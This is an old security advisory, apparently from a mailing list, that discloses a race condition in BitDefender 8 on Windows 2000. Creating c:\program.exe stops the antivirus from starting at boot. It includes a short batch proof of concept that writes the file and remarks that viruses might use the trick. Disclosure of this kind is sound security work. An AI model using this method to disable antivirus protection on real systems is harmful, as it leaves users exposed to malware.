<<< Date Index >>>     <<< Thread Index >>>

BitDefender 8 - Race condition vulnerability




-----------------------------
Product: BitDefender
Version: 8
Tested on: Windows 2000 SP4
Vulnerability: Race condition
-----------------------------

BACKGROUND
----------
BitDefender ensures the most advanced antivirus protection, as well as data 
confidentiality, active content control and Internet filtering.
A powerful antivirus tool with features that best meet your security needs.
Source: www.bitdefender.com


VULNERABLE PRODUCTS
-------------------
BitDefender 8 Professional Plus
BitDefender 8 Standard Edition
Maybe other...


RACE CONDITION
--------------
At Windows startup, when a file named: program.exe is found on c:\ 
Windows send an alert message, messagebox controls are:
2 buttons -> "Rename" or "Ignore"
1 checkbox -> [X] Do not do this verification on startup. 
(Sorry, haven't got the exact english message)

At this moment, BitDefender can't start, so we have a session without virus 
protection.


PROOF OF CONCEPT
----------------
Open your notepad.exe and paste this batch script.

@echo off
echo #-------------------------------------------------------#
echo [   SecuBox - Proof of Concept        (04.12.2005)      ]
echo #-------------------------------------------------------#
echo # This script just create the race condition.           #
echo # It might be use by virus.                             #
echo # Now, reboot your computer and watch your BitDef !     #
echo #-------------------------------------------------------#
echo # Be carefull, for virus protection need another reboot #
echo # Closing your Windows session is not sufficient !      #
echo #-------------------------------------------------------#
echo BitDef PoC > c:\program.exe
pause
exit


EXPLOITATION
------------
Save this batch script as TEST.BAT and try it.


VENDOR STATUS
-------------
Vendor have been contacted but no reply ...


CREDITS
----------------------
SecuBox Labs - fRoGGz
unsecure@xxxxxxxxxxx
----------------------